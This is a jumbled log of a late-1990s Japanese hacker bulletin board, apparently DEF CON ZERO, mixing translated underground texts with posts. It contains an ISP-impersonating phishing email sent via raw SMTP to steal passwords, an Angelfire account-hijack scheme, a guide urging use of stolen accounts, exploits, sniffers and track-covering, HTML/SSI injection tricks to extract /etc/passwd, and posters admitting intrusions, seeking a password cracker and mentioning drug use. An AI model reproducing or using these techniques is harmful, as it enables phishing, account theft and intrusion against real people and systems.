ak2/r00t7/index.html"> http://www.angelfire.com/mi/KrazieBread/
index.html </a> has been saved.<br>
You may have to click Reload or Super-Reload (Shift+Reload) to
see your edited page and not your old version when you go to
your URL.<br> You can also announce your new page on <a href="
http://homepages.whowhere.com/bin/showpage.pl?add">WhoWhere?</a>,
<a href="http://newtoo.manifest.com/"><u> What's New Too!</u>
</a>, or if you really want to get noticed, go to <a href="
http://www.submit-it.com/"><u>Submit It!</u></a><br> Tune up
your Web Site at the <a href="http://www.angelfire.com/cgi-bin/
ct?ad=websitegarage&vp=/index.clicked&ru=http://www.websitegar
age.com/whowhere">Web Site Garage</a>.</font>
</td></tr></table></center>
<form select method="post" action="http://www.angelfire.com/cgi-bin/bedit">
<input type="hidden" name="storage"  value="mi">
<input type="hidden" name="hpd"      value="r00t">     
<input type="hidden" name="password" value="r00t7">  <------- PASSWORDだ！

ユーザ名はURLの中に含まれているので、見つけるのは簡単だ。
http://www.angelfire.com/whatever/USERNAME/

Moving in for the Kill

1.)
hackしたい者を探し、彼に「perlスクリプトを通じてkeyloggerとpacket
snifferをインストールさせてしまうIE 4.0とNetscape Communicatorの
バグを見つけた」
と告げる。

2.)
彼に、bedit.html に記載されている情報が無いとスクリプトが動かない
ので bedit.html が必要だと告げる。

3.)
彼があなたにそのファイルを送ったら、必要としているものをもらおう。
Loginして、bedit.html からchange e-mailをクリックして、Hotmailか何か
に変更しよう(あなたの本当のe-mailは使わない)。

4.)
そのページをどうするかはあなた次第だが、よく考え後悔しそうなことは
避けよう…この行は書くのも馬鹿らしいが。

Conclusion

楽しんでもらえただろうか。
Angelfireの弱点を発見したeZoOns氏に、そしてIllumiTIE、r00t sE7EN、
Big Cheese、JellyNuts、Optiklenz、Godshippy各氏に感謝する。

> それ、お前がほんとに訳したのか？
> 同じく原文を翻訳したもの持ってんだけど、それを見て、日本語変えただけだろ。

はい、私が訳しました。原文と照らし合わせれば分かると思いますが、
原文に忠実な逐語訳になっています(that text should gag every
 newcomer's mouth.の部分とか見れば分かりますね)。大体、いちいち
他人の訳したものを改変しても得しませんから。

でもそっちの意訳の方が読みやすいですね。もらっときます(笑)。
Thanx

参考：05月20日(木)02時35分19秒

それ、お前がほんとに訳したのか？
同じく原文を翻訳したもの持ってんだけど、それを見て、日本語変えただけだろ。

夜の部にだいぶ前にリンク張られてた奴なんだけど、とりあえずアップしときました。
比較してみて下さい。
http://vip-room.virtualave.net/HowToBecome.txt

http://vip-room.virtualave.net/HowToBecome.txt

> お、いいすね。

少し流し読みしましたが、相当の力作ですね。「逮捕」なんて
項目まで有ります。
(1)即座に弁護士を呼べ
(2)警官とは話すな
なんて、ドキドキしてしまいます(笑)。

だいぶ前に訳した物ですが、古典的なSocial Engineeringを一つ。

How to Get Your friend\enemy's ISP password ?
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
さて、
君は貯金を始めたくないか？
そして…君はISPに金を払いたくない、違うか？
よし！これを読んでくれ：

    Disclaimer:
     このテキスト及びテキストの内容は教育目的のみに書かれている。
     このテキストを元になされた行為は読者が責任を負うものとする。
     このテキストの筆者はこの情報を元になされた行為に対して責任を
     一切負わない。

    - FoX
            <訳者注>私も負いません。</訳者注>

これでよし、と。さあ始めよう！

   1.) telnetプログラムを走らせる:
       windowsなら START --> RUN --> "TELNET" だ。
       linuxなら shellを開いて telnet だ。

   2.) 次に、どこかのanonymousサーバに接続しよう。
       windowsなら"connect"、linuxなら"open"だ。
       もしサーバを知らないなら一つでいいから見付けて見よう。
       もし君がひどくlameなら俺にメールしてくれ！数分で教えて
       やるから。
     注意：君はサーバのport 25に接続しなければいけない！

   3.) 次に、以下のように書く:
       
        mail from:[**YOUR FRIEND'S ISP WEBMASTER**]
        rcpt to:[**YOUR FRIEND'S EMAIL ADRESS**]
        data
        こんにちは [YOUR FRIEND'S NAME]様、こちらは[NAME OF YOUR
        FRIEND'S ISP]サポートチームです。
        さて、最近当社のサーバに接続に関するて問題が発生し、
        ユーザ名/パスワードのファイルが壊れてしまいました。
        バックアップによって現在復旧しましたが、昨日、そのバック
        アップが旧バージョンであることが判明し、このままでは
        あなたに莫大な使用料が課されてしまいます。
        - - - - - - - - - - - - - -
        問題解決の為、エラーを修正するプログラムを作成しました。
        あなたがすることは下記メールアドレスにメールを送るだけです。
         "[**YOUR'S FRIEND'S ISP NAME**]@GalaxyCorp.Com"
         SUBJECTにはユーザ名とパスワードを書いてください。

        注意：もしこの指導に従わなかった場合、課金は取り消せません！

                   よろしくお願いします。
                                           サポートチーム

   4.) Enterを二回押して "." を入力して(""は要らない)Enterだ！

--
**が何を意味しているか分かりにくいかも知れないので、
簡単な例を挙げよう。;)

[**YOUR FRIEND'S ISP WEBMASTER**] - 例えば、もしあなたの友人が
AOLの会員ならば "webmaster@aol.com"

[**YOUR FRIEND'S EMAIL ADRESS**] - 例えば、もしあなたの友人の
メールアドレスが john@aol.com ならば "john@aol.com"

[YOUR FRIEND'S NAME] - もしあなたの友人がJohnと呼ばれているならば
"John"

[NAME OF YOUR FRIEND'S ISP] - もしあなたの友人がAOL(American
Online)の会員ならば "American - Online"

"[**YOUR'S FRIEND'S ISP NAME**]@GalaxyCorp.Com" - ここは難しい所だが
あなたはこのテキストを読んでいるので心配は要らない。;)


*   WWWブラウザを起動して(IEでもNETSCAPEでもいい)
    "HTTP://www.galaxycorp.com"とタイプ。

*   アカウントを取る為にサインアップ。ユーザ名を何にするか尋ねられたら
    ISPの名前に最も近いものを試してみる。例えば、もし君の友人が American
    Online[AOL] のユーザなら、aol や a_o_l や american_online を試してみよう！

*   メールアドレスを尋ねられたら、ここは本当のアドレスを入力しよう！
-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
普通の生活を続けて、そして思い立った時にメールをチェックしてみよう！
もし君が突然、友人からのメールをもらって、subjectが "john j4o87HnzG" だったなら
君は毎月10ドル節約できたことになる！
 - = - = - = - = - = - = - = - = - = - = - = - = - = - = -

    F-o-X
     Contact information:
       Email - FoXeS@ThePentagoN.CoM
       WWW   - WWW.FoReSt.CC (under construction)

 - = - = - = - = - = - = - = - = - = - = - = - = - = - = -

参考：05月19日(水)17時37分00秒

> どうぞどうぞ。あんなつたない訳で良ければ。原文は
> http://members.tripod.com/~kemuri2/hack2.txt
> で拾いました。
> 
> ついでに、文中に出て来る "How to cover your tracks"。
> これも訳しますか？
> 

お、いいすね。
っていうか翻訳系なら何でもＯＫす。
私は英語アレルギーなので(笑)

参考：05月19日(水)14時46分16秒

どうぞどうぞ。あんなつたない訳で良ければ。原文は
http://members.tripod.com/~kemuri2/hack2.txt
で拾いました。

ついでに、文中に出て来る "How to cover your tracks"。
これも訳しますか？

http://thc.pimmel.com/files/thc/htcyt.html

これなかなかためになると思いますよ。
H&Cのとこに張りつけておいてもいいですか？

私もOWNED SITE(綴りあってる？(笑))ネタだしたいんだけど
恐いところだからなぁ。。。
みんながみんなJPNICみたいに寛大だとは限らないのが恐いところ。笑い

参考：05月19日(水)01時25分52秒

> よーく見たら、ペンギンの写真とこに何か書いてある（笑）
> いゃーん（笑）

綴り間違ってる様子(笑)（White_eさん、指摘ありがとうです。
ぴえすでファイル残ってたらすぐ直せるんだけど。


> ていうか、このエンペラーペンギン、恐いっすね...
> ハラが、なんか爆発しそうで...

これ、ふつーのペンギンをフォトショッピングしただけです(笑)
ALTに小ネタも仕込んであったり・・

> とりあえず、「画像を名前をつけて保存」しておこう（笑）

見ましたよ(笑) 
指名手配されちゃったヽ(;;´ー｀)ﾉ
これで私はお尋ね者ですね。笑い 

参考：05月18日(火)23時03分35秒

はじめまして、Naviyといいます。
以前からここは見ていましたが書き込むのは初めてです。
TOPが変わるのが楽しみで楽しみで（笑）
侵入、ってTOPはかっこよかったですね。
今回のTOPもすごくカッコイイです。
私はまだ無知ですが、これからがんばって勉強しようと思います。
これからよろしくお願いします。

> いきなりIRCに乱入してきたドイツ人だったかな

おはようです。
つーか、Van HauserはドイツのＴＨＣっていうグループのリーダーですよ(笑)
すごい人です。

参考：05月19日(水)05時41分43秒

いきなりIRCに乱入してきたドイツ人だったかな

|----------------------- BECOME A HACKER ---------------------------|

君は既にいくつかのシステムのrootをhackした、しかし君はまだ
hackerではない。何故か？hackerとは、単にサイトをhackしたり
snifferを仕掛けたりする者ではない。real hackerはシステムを
理解したくて、システムがどう反応するか知り、システムを掌握
することで楽しみ、バグを発見し新たなツールを発明することを
面白く思う者だ。
それは言わばサイバースペースのコロンブスと言われるべき者だ。

14. 他のhackerと連絡を取り合い、情報や経験やアカウントや
exploitsやファイルを交換しよう。

15. NewsgroupやMLやIRCの議論を読め。
重要なRFCやCを学び、自身のツールをプログラムしろ。

16. "31337"になるな。
君はcoolであると自覚していてもそれを他人に知らしめる必要は
無い。普通に振る舞い、「どうやってUNIXをhackするんですか？」
と尋ねる者を助けよう。

訳者注：31337 = ElEET、エリート。

17. 疲れてはいけない。
現場にとどまり、newsgroupやMLや友人を見続け、hackingを
やめるな。17へ。

私からはこれだけだ。
このテキストは全ての初心者に吐き気を催させるだろう。
簡潔で汚いものだが、本当に必要なことを書いたつもりだ。

チャオ……

================================
はい。長い割にあまりタメにならない内容でしたね(笑)。
ではさようなら。

    |------------------------- BEGIN HACKING -------------------------|

 9. 他人のアカウントを手に入れろ。
君が知り合ったhackerに頼もう。君自身のアカウントでは
決してhackしてはならない！

10. このアカウントで最初のシステムをhackしろ。
exploit等を試そう。しかし最初の不正アカウントが履歴を
残さないように"How to cover your tracks"という記事は
覚えておくように。

11. より多くのホストを手に入れる為、ypxやsendmail exploits
や危険なNFS exports等を使え。
もし巨大なホストリストを持っていて自動的にテストする
スクリプトを使ったなら、この「古い」やり方も成果を上げる
だろう。しかしどこでホスト名を探すのか？多くの方法が有る。
IRCや /etc/hosts やWWWやWWWアクセスの統計等を試せ。
多くのホストが手に入るだろう。

12. rootが取れたなら、出来ればsnifferを仕掛けろ。
そうすることで多くの新しいホストのアカウントが手に入るだろう。

13. 君が作ったexploitを試してみよう。
最終的にはそれらが動かねばならない。12へ。

|------------------------ LEARN THE BASICS -------------------------|

 6. UNIXとInternetセキュリティに関する良い本を手に入れろ。
私が見つけた最高のものはGarfinkel Spafford共著の"Practical
Unix Security"第二版だ。UNIXが持つ基本的なセキュリティ
問題や穴や人々が犯すミスを学べ。

 7. Internetで見付かる全ての情報とファイルを集めろ。
wwwやftpを試し、検索エンジンを使え。セキュリティ関連のMLに
登録し重要そうなnewsgroupも読むように。IRCで良いサイトを
尋ねよう。

    Here is something to start:
	http://underground.org
	ftp://onyx.infonexus.com
	nntp://comp.security.*

    And of course the links on the Security & Hackerscene page ;-) 

	bugtraq mailing list ->
	email : listserv@netspace.org
	message body : subscribe bugtraq you-real-name 

 8. ファイルやデータを読んで分析せよ(ただ集めるだけでなく)。

"suid","sniffer","buffer overflow","firewall","rdist",
"nis","nfs", "satan" これらの言葉の意味と重要性が本当に
分かったならば先に進もう。

|-------------------------- HOW TO START ----------------------------|

 1. それに慣れろ。
馬の扱いを知らずしてロデオは出来ないだろう。

 2. UNIX領域を作れ。
Linux, FreeBSD, Solaris, Sinix 等を自分のコンピュータに
入れろ。LinuxとFreeBSDは安価でFreeBSDはBSDの系列であり、
Sys V系列のSolarisとSinixは高価だ。
助言：良いハンドブックがあるLinuxをお勧めする。

自分自身のUNIXの操作を学ばねばならない。最初にディレクトリ
変更、コピー、削除、エディタの使い方などの基礎を学べ。

 3. UNIXを使う動機付けをしろ。
どのようにするか、それは君次第だ。君のUNIXのデータベースを
使うのかも知れないしCでプログラミングするかも知れないし、
いずれにせよUNIXの使い方を学ばねばならない。

 4. 参考書を買え。
たくさん出版されているので良い店に入る。大学の近くのが良い、
そこの店員はどの本が良くてどの本が悪いのかを知っている。
私はO'Reilly Nutshell handbooks がいいと思うがAddison
Wesleyのは殆ど全て嫌いだ……個人的な意見だが。

 5. Internetアカウントを手に入れろ。
PPPと、出来ればshellが欲しい。hackingや、PGPを用いない
情報交換は決してしてはならない！君のコンピュータのUNIXを
ISPに接続出来るよう設定してみろ。数は少ないが良いハンド
ブックには具体的な記述が有る。

これら五段階を済ませてUNIXの操作を覚えたら(それは2〜8週間
かけるべきだ)次の段階に進もう。

お返事はメールでたった今出しました。ってこれだけで帰るのも
なんですね。折角天下のDEF CON ZEROに来たんだし…(ゴソゴソ)、
よし、こんなテキストを貼り逃げしてみよう。

============ hack2.txt ============
Author: van Hauser / THC

君はUNIX hackerになることを決心したがどうやって始めるか
分からないかも知れない。君が本当に始める前に、次のことは
絶対にはっきりさせておけ。

 1. Hackingは多大な作業である。
刹那的快楽の為の子供の遊びではない。君はシステムの操作や
プログラムの方法を学ぶ必要が有る。君はそれらがどう反応するか
研究し、ソースコードを読まねばならない。長く厳しい道のりで
あると忠告しておく。

 2. Hackingは違法行為である。
少なくとも大部分の国では(オランダとアルゼンチンだけは確か
hackingを取り締まる法律が無かったはずだが、だが必ず作られる)。
他人のアカウントでシステムに入ることさえも犯罪であり罰せられる。
有罪が言い渡されたら、君に前科が記録される。コンピュータ
犯罪者を従業員にする会社は殆ど無いので君の一生は台無しに
なるだろう。

 3. Hackingは時間がかかる。
半年だけhackingをして3箇月休んで、また舞い戻るというのは
不可能だ。Internetでは時が流れるのは早い。
新たなUNIXのリリース、新たなバグ、新たなバグフィクス……。
一度exploitにおいて遅れを取ったら、君は仲間に新しいものを
くれるよう頼まねばならない。そしてそんなことが続けば疎まれる
だろう。hackingの半分以上の時間は情報収集に使われる。
他のhackerと話し、MLやnewsgroupを読み、良いWWWやftpサイトを
巡れ。

しかし、本当にUNIXをhackingする動機は何だろう。それは君
次第だ。君がhackerになりたいのならば、何故なりたいのか
考えてみよう。"The Net"や"Hackers"のような映画は忘れるように。
あれは現実ではない！英雄になったり、ペンタゴンをhacking
したり、セクシーで女にもててセキュリティ会社でいい給料を
貰える男になる夢は捨てろ。これは起こり得ない。
だから、なぜそれをしたくて、なにを期待しているのか
明確にしろ。警察が逮捕に来て母親が泣くのを想像出来るか？

これらの警告を常に心に留めておけ。これは、君がやっている
こと、そしてやろうとしていることを明確にする為だ。

このガイドを書いたのは、しばしば上級のphreakerやblueboxers
ですら「どうやってUNIXをhackするのか？」と尋ねてくるからだ。
何度も何度も尋ねられて疲れてしまったので、これを書いた。
不備や誤りを責めないでくれ。私は気にしない。
最もタフな生き残りの為に…だから、君が本当に初心者ならば
このテキストから出来るだけ多くのことを学んで欲しい。

よーく見たら、ペンギンの写真とこに何か書いてある（笑）
いゃーん（笑）
ていうか、このエンペラーペンギン、恐いっすね...
ハラが、なんか爆発しそうで...
とりあえず、「画像を名前をつけて保存」しておこう（笑）

メールくれたWhite_eさん、指摘どうもありがとう御座いました。
これでなおっているでしょうか？

といいつつindexを別のに変えてみました(笑)

> この前HCDスキャンしてたら、コールバックがんがんかかってきて
> 怖いねぇ（笑）

ある意味もろ逆探知やん・・・
やってるあなたもおそろしいです(笑)

参考：05月18日(火)00時16分04秒

>RZ
この前HCDスキャンしてたら、コールバックがんがんかかってきて
怖いねぇ（笑）

> 
> はずかしいからリンクやめようよ（笑）

イヤ(笑)
数少ない電話系なんだから
残しましょう。笑い

ってかまだ使えるよねぇ？

参考：05月15日(土)23時55分04秒

> HTTP_USER_AGENTにxmpだのを仕込む・・・・
> かなり前に某団体"Ｇ"のＡ氏がＨＰに書いてから一気に広まったやつね☆
> 
> ま、やられた方はたまったものじゃないので、ほどほどに☆
> （それより、荒らしネタっていいんですの？＞ＲＺ氏）

書き方にもよるでしょうけど、
テクニック自体ならＯＫですよ。

参考：05月15日(土)19時32分38秒

すみません。ペーストでミスってました。

$ nslookup 
Default Server:  localhost
Address:  127.0.0.1

> set q=mx
> geocities.co.jp
Server:  localhost
Address:  127.0.0.1

geocities.co.jp preference = 10, mail exchanger = mail.geocities.co.jp
geocities.co.jp nameserver = dns.geocities.co.jp
geocities.co.jp nameserver = ns2.sphere.ad.jp
mail.geocities.co.jp    internet address = 210.153.89.137
dns.geocities.co.jp     internet address = 210.153.89.130
ns2.sphere.ad.jp        internet address = 202.239.113.26
> 

ですね。set q を忘れてはダメですね。

> 　メールアドレスとパスワードが分かっていて、受信サーバが分からない場合
> メールの受信はできるのでしょうか？
> 　大学のアドレスに来ているメールを自宅で今すぐに受け取りたいんですが、受信サーバと送信サーバが分からなくて、アカウントの設定ができません。どなたかよい知恵を
> お貸しください。お願いします。　

メールアドレスが判っているということは、@に続くドメインが判ってるはずだから
mail exchanger(メールサーバー)をDNSに聞けばよいだけでわ?
簡単に書くとnslookupする。

$ nslookup
Default Server:  localhost
Address:  127.0.0.1

> geocities.co.jp
Server:  localhost
Address:  127.0.0.1

geocities.co.jp preference = 10, mail exchanger = mail.geocities.co.jp
geocities.co.jp nameserver = dns.geocities.co.jp
geocities.co.jp nameserver = ns2.sphere.ad.jp
mail.geocities.co.jp    internet address = 210.153.89.137
dns.geocities.co.jp     internet address = 210.153.89.130
ns2.sphere.ad.jp        internet address = 202.239.113.26
> exit
$

これでいいんじゃないの?
あとは、そのサーバーが外からのPOPアクセス可能ならばメールを取ることが
出来るでしょう。

　メールアドレスとパスワードが分かっていて、受信サーバが分からない場合
メールの受信はできるのでしょうか？
　大学のアドレスに来ているメールを自宅で今すぐに受け取りたいんですが、受信サーバと送信サーバが分からなくて、アカウントの設定ができません。どなたかよい知恵を
お貸しください。お願いします。　

>http://www.ugtop.com/defcon0/hspeed/hs_index.htm

はずかしいからリンクやめようよ（笑）

HTTP_USER_AGENTにxmpだのを仕込む・・・・
かなり前に某団体"Ｇ"のＡ氏がＨＰに書いてから一気に広まったやつね☆

ま、やられた方はたまったものじゃないので、ほどほどに☆
（それより、荒らしネタっていいんですの？＞ＲＺ氏）

> 
> 芸が細かいな(笑)
> ログは今日みたけど、なかに事情通が何人かいた様子だな。
> というか、マジで一部はホンモノっぽいよ。笑い
> 
> 

一部つーかかなりほんものだったよ。
越**（本当の本物）が「越**(本物)」っつーHNの偽物に
「結構似てるな」なんて誉められてたよ。（笑）

参考：05月13日(木)21時18分16秒

ほんとだ、初めて知った。
結構楽しいかも（笑）
うぃ〜ん

多少有名だけど、名前が挙がらなかった人は
悔しがってるでしょうね。

> 
> 来てたじゃん。ほらほら。

芸が細かいな(笑)
ログは今日みたけど、なかに事情通が何人かいた様子だな。
というか、マジで一部はホンモノっぽいよ。笑い

参考：05月13日(木)17時22分31秒

> > 楽しそうだったらしい・・・見逃したヽ(´ー｀)ﾉ 
> >
> (無題)　投稿者：お＊＊＊＊コ 　投稿日：05月13日(木)00時56分56秒
> 
> ども　私からハクとったら何ものこりません

来てたじゃん。ほらほら。

ハクしちゃぃゃんょ。(;´Д`)

URLのけつに?<XMP><PLAINTEXT>入れてから
アクセス先に飛ぶと楽しいこと（つまらん）起こります。
(アクセス先にHTTP_REFERER表示している場合)
一番楽しいやり方はアクセスログをGIFで仕掛けてそれから
SSIぶっこむんで /etc/passwd ぬきだすという技ができていたところも
あったような。すかし足跡もろに残りますけど。とっとと消しちゃいましょう。（爆）

楽しそうだったらしい・・・見逃したヽ(´ー｀)ﾉ 

下の書きこみの「<」、「＜」です、半角の。

はじめまして。

投稿者のHTTP_USER_AGENTを表示したり埋め込んだりする掲示板では、
HTTP_USER_AGENTにタグを仕込むとタグ無制限になっちまいますね。
試した掲示板の数が少ないからわからないけど、あまり気づかれてないんですかね。

あと、これは俺の知り合いの書きこみが元で発見したんですが、
TCUPでURLのところに数字を入れて書きこむと、書きこむ時点で一番新しい
記事から数字分さかのぼった記事がトップになり、それ以降の記事が
表示されなくなります。
その後、普通の書き込みすると元に戻ります。
大きな数指定すると記事が表示されなくなっちゃうんで、
一番乗りとかいう書きこみがきそうで楽しいです。

あとTCUPでは「<font "」をメッセージ内に入れると、
それ以降の書きこみが右にずれます。
何度もやるとどんどんずれます。
楽しいです。

Mr.BOO's KRaD Telecom SIG <http://www.ugtop.com/defcon0/hspeed/hs_index.htm>
Japan UnderGround F.A.Q <http://www.ugtop.com/defcon0/faq/toc_test.htm>
気づかなかった

faq/toc_test.htm

　どうやら私の17インチモニタ−の設定（800/600）では、下の二つのリンク
が完全に隠れるので、どこにあるのかわからなかったようです
ということは、私と同じ設定の人はみんな見過ごしていたといういこと・・・？

> volmgtをstopしてtarで落としてftpで取ってきました。
> ソフトは「eggdrop」という物だったのですがどういうソフトか分かりません。
> だれかおしえてくれませんか？

おそらくirc用のボットです。
防御に優れているので外人とかよく使ってるみたい。
でも確かeggdrop用exploitとかあったような。笑い

参考：05月11日(火)15時50分04秒

はじめて書き込みさせて頂きます。
私はちょくちょくハッキングはしてるんですが、結構悪戯っぽい事をやってます。vfstab編集したり(笑)
こないだ入ったサーバー(Solaris2.6)で色々遊んでいたらFDが入っている事に気づき
volmgtをstopしてtarで落としてftpで取ってきました。
ソフトは「eggdrop」という物だったのですがどういうソフトか分かりません。
だれかおしえてくれませんか？

それにしても皆さんカッコいいメールアドレス持ってますね(笑)
BSのメアド、私も欲しいな。

> 　どうも、初めまして書き込みさせていただきます
> Indexの侵入ってのが、余りに場所が場所なだけにスゴ味がありますね（笑）
> ちょくちょくとＲＯＭさせてもらってるんですが、むか〜しにあったＦＡＱ
> は廃止になったんでしょうか？（すごく勉強になったのですが）

ありますよ。
フレームの下がメニューになっています。
top.htmってやつです。リンクもはっときます。
でわ

死ぬほど胃が痛い・・・・しくしく

http://www.ugtop.com/defcon0/top.htm

下の'石川五右衛門について'なのですが、
UNYUNさんの所と間違えてカキコしちゃいました。
どうもスイマセン！！
改めまして、mk-2と申します。
ご迷惑をおかけ致しました。m(__)m

侵入ど　どかーんと　あったのにはおどろいたよ。
まぁ侵入なんて最近後無沙汰だから心臓発作まで起きることはないが。

GETINFOクラスは初期化として他のクラスのインスタンスを生成してるだけで
すね
メインはこんな感じですね。

表示する文字の配列をつくっといて（Get your name. etc...）
カウンタを２個作って,ボタンは無効にしてと
thread生成して、こんなものでも走らすか

まず、無限ループ開始！

おっと、もっともらしくするためにしばらくおねんね

もし配列数よりカウンタ１が少なかったら
  {
    さらにカウンタ２が０ならば
      {
        テキストエリアに配列の”カウンタ１”番目を表示して
        カウンタ２インクリメント
       }
     いやいや、そうじゃなくてカウンタ２が３以内だったよ
      {
        テキストエリアに”.”を追加して
        カウンタ２インクリメント
       }
     それでも違えば 
       {
         エキスとエリアに”ok”表示してカウンタ２を初期化
         カウンタ１インクリメント
        }
    }
いや、はなっから違うね
  {
    ボタンが有効だったら次いってちょうだい

    そうじゃないなら
    テキストエリアに”ありがとう”と表示してボタン有効にしてね
   }
    次いって頂戴
}

やや（笑）抽象的ですが、オリジナルは尊重すべきということで..
逆コンパイルは良くないこととの認識を持ってますので（笑）

４月の頭に、ウチの後輩が「なんか、やられちゃったみたいなんっすけど〜」
とか言ってたのと同じヤツみたいです。結構普及(?)してるみたいですね。
たしか時期的にえーぷりるふーるだったと思いますんで、たぶんシャレだと...
ナマケモノな人なんで、そのまま放置してるんでしょう（笑）

＞mk-2さん
それは、ウチのことじゃないでしょうか...？

http://BASE.OC.TO/skyscraper/byte/551/

どうもそれっぽいですねぇ.
中身見てみた感じですと... 逆compileするまでもないかな...
# local diskへのaccessが行われるんで,しっかりしてるのかと思ったのですが
# 単純にJVMの起動？

>GETINFO.classダウンしてみたのですが・・1KBにしかみたず

インナークラスを含めて全てで三つのクラスファイルがあると思います。
因みに個人情報奪取に関してはハッタリであることは言うまでもありません。
for文で文字列を順番に表示してるだけです

　どうも、初めまして書き込みさせていただきます
Indexの侵入ってのが、余りに場所が場所なだけにスゴ味がありますね（笑）
ちょくちょくとＲＯＭさせてもらってるんですが、むか〜しにあったＦＡＱ
は廃止になったんでしょうか？（すごく勉強になったのですが）

　では、季節の変わり目ですどうぞ御自愛下さい

はじめまして、mk-2と申します。
過去ログで、'石川五右衛門'なるパスクラッカーが話題に上っていましたが、
配布は終了してしまったのでしょうか？？
よろしければ、頂きたいのですが・・・。
初カキコでお願いなんて大変申し訳ありませんが、
どうか、宜しくお願い致します！！

　大麻絡みだったらこんな所もあるよ

http://www2.plala.or.jp/amemiya/

　RZさん　皆さんこんにちは。

　先日は相談にのっていただいてありがとうございました。GETINFO.classを
ダウンしてみたのですが・・1KBにしかみたず　本当にダウンできているのか
疑問です。（笑）

　TOP笑わせて頂きました(^_^)　私も漢字は疎いのですが（爆）MS-IMEで
調べるに・・・ 侵(9)入(2)みたいです。　で紙に書いてみると・・・予想では・・・

侵 3-4 8-9 10-11
入 2-3　　　　　　　　が一画になると推測されます。

　どこかで字画での運勢を診断してもらえないかな（笑）以上揚げ足取りのようで
・・・　申し訳ありません。

> こないだからSparcとIntenのSolarisがメインマシンになったんですけど、
> 相変わらず遊んでばかりで、本業はちっともはかどらないです（笑）

私は全然遊べてないです。笑い


> ところで、アレ、高速広域スキャナなだけにテストが困りますね（笑）
> 回数できないので、かなり真剣にデバッグせんといかんのはツラいかも...
> あれからもし変更があったら、また送ってもらえませんか？

ぅぃす。
とりあえずクラスＣ用で実験でもしてみます。これなら安全なので(笑)
まぁデータは後からついてくるもんですからどうにかなるでしょう。
狂ったようにRSTとばしてくるやつとか面白かった。笑い

参考：05月08日(土)11時00分37秒

以前から、ロムっていましたが書き込むのは初めてっす
偽○○○○君とは、以前某米国人が来日したとき
携帯でお話しさせていただきました

ドラッグ系の話がちょこっと出てきたので
思わず書いてしまった次第です
今後のコンテンツ充実を期待しているっす

こないだスカンクの極上、仕事中にやったら
大変なことになったっすよ、あはははは

いやー、今回のINDEXは私もハマりました。
ちゅか、そのまんまですね（笑）

こないだからSparcとIntenのSolarisがメインマシンになったんですけど、
相変わらず遊んでばかりで、本業はちっともはかどらないです（笑）
ちょっと前のIRIXもヒドかったですけど、SolarisはBuggestUNIXですね。

ところで、アレ、高速広域スキャナなだけにテストが困りますね（笑）
回数できないので、かなり真剣にデバッグせんといかんのはツラいかも...
あれからもし変更があったら、また送ってもらえませんか？

それと、実はサイバー犬は最近Solaris２.ｘに対応したんですけど、こないだの
不幸な事故でアップ前に死亡してしまいました。でも、変更は意外とアッサリ
だったんで、また作ります。私も要るので(笑)。

サイバー犬についてですけど、
ソラリス2.x(多分2.4か2.5)用にはできないものでしょうか。

ってくれくれ君だなこれ・・・(笑)

参考：05月08日(土)05時01分17秒

> ＞KUSUさん
> そういうトコは、もともとそういう人がやってるんで、期待しても無駄かも
> しれないです。

あー、ウチとか？(笑)
未だにリンク集とかフレーム内表示だし・・・・


> ＞ＲＺさん
> ドラッグですかー。小心者の私にはとてもコワイ世界ですが、濃いーの楽しみに
> してます。
> とりあえず、今すぐ欲しいのは、バシっと冴えて、楽しい気分でスパスパっと
> 仕事が片付くヤツなんですけど(笑)、そんなのナイですよね...

一応、覚醒するヤツはあるみたいですよ。笑い
私は未体験ですが。っていうかやりません(笑) 　ほのぼのと楽しんでます。
ま、書いたとしてもマジでやってる人の文章には多分かなわないでしょぅねぇ・・

うにゅんさん、何やらすご